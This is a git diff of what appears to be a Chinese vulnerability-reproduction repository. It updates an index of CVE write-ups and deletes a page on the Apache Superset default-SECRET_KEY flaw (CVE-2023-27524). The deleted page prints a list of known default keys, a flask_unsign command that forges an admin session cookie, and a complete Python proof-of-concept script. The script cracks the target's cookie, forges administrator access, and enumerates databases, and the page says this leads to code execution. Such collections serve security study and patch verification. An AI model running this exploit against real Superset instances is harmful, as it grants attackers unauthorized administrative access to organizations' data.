diff --git a/README.md b/README.md index 6fe07d3..91679f8 100644 --- a/README.md +++ b/README.md @@ -253,7 +253,8 @@ * Apache Airflow 远程代码执行漏洞 CVE-2022-40127 * Apache Airflow 默认密钥导致的权限绕过 CVE-2020-17526 * Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323 - * Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524 + * Apache Superset Python Pickle 反序列化导致远程代码执行 CVE-2023-37941 + * Apache Superset 硬编码 JWT 密钥导致认证绕过漏洞 CVE-2023-27524 * Apache Unomi 远程表达式代码执行漏洞 CVE-2020-13942 * Apache Zeppelin 未授权任意命令执行漏洞 * Appspace jsonprequest SSRF漏洞 CVE-2021-27670 @@ -281,8 +282,10 @@ * Atlassian Questions For Confluence 身份认证绕过漏洞 CVE-2022-26138 * AVCON6 系统管理平台 download.action 任意文件下载漏洞 * AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞 + * Cacti graph_view.php SQL注入导致远程代码执行漏洞 CVE-2023-39361&CVE-2024-31459 + * Cacti remote_agent.php 前台命令注入漏洞 CVE-2022-46169 + * Cacti RRDTool 后台参数注入导致远程代码执行 CVE-2025-24367 * Cacti SQL 注入漏洞 CVE-2020-14295 - * Cacti 前台命令注入漏洞 CVE-2022-46169 * CactiEZ weathermap 插件任意文件写入漏洞 * Casbin get-users 账号密码泄漏漏洞 * Casdoor static 任意文件读取漏洞 @@ -827,6 +830,8 @@ * ThinkPHP5 5.0.22 5.1.29 远程代码执行漏洞 * ThinkPHP5 5.0.23 远程代码执行漏洞 * ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 + * Vite 开发服务器任意文件读取漏洞 CNVD-2022-44615 + * Vite 开发服务器任意文件读取漏洞绕过 CVE-2025-30208 * XStream SSRF 反序列化漏洞 CVE-2020-26258 * XStream 任意文件删除 反序列化漏洞 CVE-2020-26259 * XStream 反序列化命令执行漏洞 CVE-2021-21351 diff --git a/Web应用漏洞/Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524.md b/Web应用漏洞/Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524.md deleted file mode 100644 index a2f9bbf..0000000 --- a/Web应用漏洞/Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524.md +++ /dev/null @@ -1,205 +0,0 @@ -# Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524 - -## 漏洞描述 - -Apache Superset 是一款现代化的开源大数据工具,也是企业级商业智能 Web 应用,用于数据探索分析和数据可视化。它提供了简单易用的无代码可视化构建器和声称是最先进的 SQL 编辑器,用户可以使用这些工具快速地构建数据仪表盘。CVE-2023-27524 中,未经授权的攻击者可根据默认配置的SECRET_KEY伪造成管理员用户访问Apache Superset。 - -## 漏洞影响 - -``` -Apache Superse <= 2.0.1 -``` - -## QUAKE - -``` -app.name="Apache Superset" -``` - -## 漏洞复现 - -登陆页面 - -![image-20230504141719702](images/image-20230504141719702.png) - -漏洞修复补丁 - -``` -https://github.com/apache/superset/pull/23186/files -``` - -![image-20230504142107277](images/image-20230504142107277.png) - -补丁代码中,新建了判断用户是否使用了默认的Key进行配置,如果为默认的Key,就直接中断启动,。但在 Docker的 env 下还是添加了固定的 Key: TEST_NON_DEV_SECRET - -![image-20230504142118809](images/image-20230504142118809.png) - -``` -# https://github.com/horizon3ai/CVE-2023-27524/blob/main/CVE-2023-27524.py -SECRET_KEYS = [ - b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', # version < 1.4.1 - b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1 - b'thisISaSECRET_1234', # deployment template - b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation - b'TEST_NON_DEV_SECRET' # docker compose -] -``` - -以Docker下的环境举例 - -![image-20230504142138933](images/image-20230504142138933.png) - -初次请求时会获取到 Cookie, 使用默认Key验证 Cookie是否可被伪造 - -![image-20230504142150081](images/image-20230504142150081.png) - -登陆主页面观察主要参数 - -![image-20230504142206013](images/image-20230504142206013.png) - -通过设置参数 user_id 和 _user_id 为 1 ,构造加密Cookie - -``` ->>> from flask_unsign import session ->>> session.sign({'_user_id': 1, 'user_id': 1},'TEST_NON_DEV_SECRET') -'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZE51uw.EdD7zSzojgY4keqZLOKR4GndJf8' -``` - -利用构造的 Cookie就可以获取到 Web后台管理权限, 后台中存在数据库语句执行模块,通过设置允许执行其他数据库语句后利用数据库语句 RCE - -![image-20230504142222421](images/image-20230504142222421.png) - -![image-20230504142234700](images/image-20230504142234700.png) - -## 漏洞POC - -```python -from flask_unsign import session -import requests -import urllib3 -import argparse -import re -from time import sleep -urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) - - -SECRET_KEYS = [ - b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', # version < 1.4.1 - b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1 - b'thisISaSECRET_1234', # deployment template - b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation - b'TEST_NON_DEV_SECRET' # docker compose -] - -def main(): - - parser = argparse.ArgumentParser() - parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True) - parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1') - parser.add_argument('--validate', '-v', help='Validate login', required=False, action='store_true') - parser.add_argument('--timeout', '-t', help='Time to wait before using forged session cookie, default=5s', required=False, type=int, default=5) - args = parser.parse_args() - - try: - u = args.url.rstrip('/') + '/login/' - - headers = { - 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0' - } - - resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False) - if resp.status_code != 200: - print(f'Error retrieving login page at {u}, status code: {resp.status_code}') - return - - session_cookie = None - for c in resp.cookies: - if c.name == 'session': - session_cookie = c.value - break - - if not session_cookie: - print('Error: No session cookie found') - return - - print(f'Got session cookie: {session_cookie}') - - try: - decoded = session.decode(session_cookie) - print(f'Decoded session cookie: {decoded}') - except: - print('Error: Not a Flask session cookie') - return - - match = re.search(r'"version_string": "(.*?)"', resp.text) - if match: - version = match.group(1) - else: - version = 'Unknown' - - print(f'Superset Version: {version}') - - - for i, k in enumerate(SECRET_KEYS): - cracked = session.verify(session_cookie, k) - if cracked: - break - - if not cracked: - print('Failed to crack session cookie') - return - - print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}') - - try: - user_id = int(args.id) - except: - user_id = args.id - - forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k) - print(f'Forged session cookie for user {user_id}: {forged_cookie}') - - if args.validate: - try: - headers['Cookie'] = f'session={forged_cookie}' - print(f'Sleeping {args.timeout} seconds before using forged cookie to account for time drift...') - sleep(args.timeout) - resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False) - if resp.status_code == 302: - print(f'Got 302 on login, forged cookie appears to have been accepted') - validated = True - else: - print(f'Got status code {resp.status_code} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.') - except Exception as e_inner: - print(f'Got error {e_inner} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.') - - if not validated: - return - - print('Enumerating databases') - for i in range(1, 101): - database_url_base = args.url.rstrip('/') + '/api/v1/database' - try: - r = requests.get(f'{database_url_base}/{i}', headers=headers, verify=False, timeout=30, allow_redirects=False) - if r.status_code == 200: - result = r.json()['result'] # validate response is JSON - name = result['database_name'] - print(f'Found database {name}') - elif r.status_code == 404: - print(f'Done enumerating databases') - break # no more databases - else: - print(f'Unexpected error: status code={r.status_code}') - break - except Exception as e_inner: - print(f'Unexpected error: {e_inner}') - break - - - except Exception as e: - print(f'Unexpected error: {e}') - - -if __name__ == '__main__': - main() -``` \ No newline at end of file diff --git a/Web应用漏洞/Cacti 前台命令注入漏洞 CVE-2022-46169.md b/Web应用漏洞/Cacti remote_agent.php 前台命令注入漏洞 CVE-2022-46169.md similarity index 97% rename from Web应用漏洞/Cacti 前台命令注入漏洞 CVE-2022-46169.md rename to Web应用漏洞/Cacti remote_agent.php 前台命令注入漏洞 CVE-2022-46169.md index 8da4aca..da85c61 100644 --- a/Web应用漏洞/Cacti 前台命令注入漏洞 CVE-2022-46169.md +++ b/Web应用漏洞/Cacti remote_agent.php 前台命令注入漏洞 CVE-2022-46169.md @@ -1,4 +1,4 @@ -# Cacti 前台命令注入漏洞 CVE-2022-46169 +# Cacti remote_agent.php 前台命令注入漏洞 CVE-2022-46169 Cacti是一个服务器监控与管理平台。在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。 diff --git a/Web应用漏洞/images/image-20230504141719702.png b/Web应用漏洞/images/image-20230504141719702.png deleted file mode 100644 index c1c2627..0000000 Binary files a/Web应用漏洞/images/image-20230504141719702.png and /dev/null differ diff --git a/Web应用漏洞/images/image-20230504142107277.png b/Web应用漏洞/images/image-20230504142107277.png deleted file mode 100644 index 1c949ce..0000000 Binary files a/Web应用漏洞/images/image-20230504142107277.png and /dev/null differ diff --git a/Web应用漏洞/images/image-20230504142118809.png b/Web应用漏洞/images/image-20230504142118809.png deleted file mode 100644 index 8b0c66a..0000000 Binary files a/Web应用漏洞/images/image-20230504142118809.png and /dev/null differ diff --git a/Web应用漏洞/images/image-20230504142138933.png b/Web应用漏洞/images/image-20230504142138933.png deleted file mode 100644 index c8c87f9..0000000 Binary files a/Web应用漏洞/images/image-20230504142138933.png and /dev/null differ diff --git a/Web应用漏洞/images/image-20230504142150081.png b/Web应用漏洞/images/image-20230504142150081.png deleted file mode 100644 index b0ee273..0000000 Binary files a/Web应用漏洞/images/image-20230504142150081.png and /dev/null differ diff --git a/Web应用漏洞/images/image-20230504142206013.png b/Web应用漏洞/images/image-20230504142206013.png deleted file mode 100644 index e1197e6..0000000 Binary files a/Web应用漏洞/images/image-20230504142206013.png and /dev/null differ diff --git a/Web应用漏洞/images/image-20230504142222421.png b/Web应用漏洞/images/image-20230504142222421.png deleted file mode 100644 index 4adf234..0000000 Binary files a/Web应用漏洞/images/image-20230504142222421.png and /dev/null differ diff --git a/中间件漏洞/images/Next.js 中间件鉴权绕过漏洞 CVE-2025-29927/image-20250324115309066.png b/中间件漏洞/images/Next.js 中间件鉴权绕过漏洞 CVE-2025-29927/image-20250324115309066.png deleted file mode 100644 index f9a8178..0000000 Binary files a/中间件漏洞/images/Next.js 中间件鉴权绕过漏洞 CVE-2025-29927/image-20250324115309066.png and /dev/null differ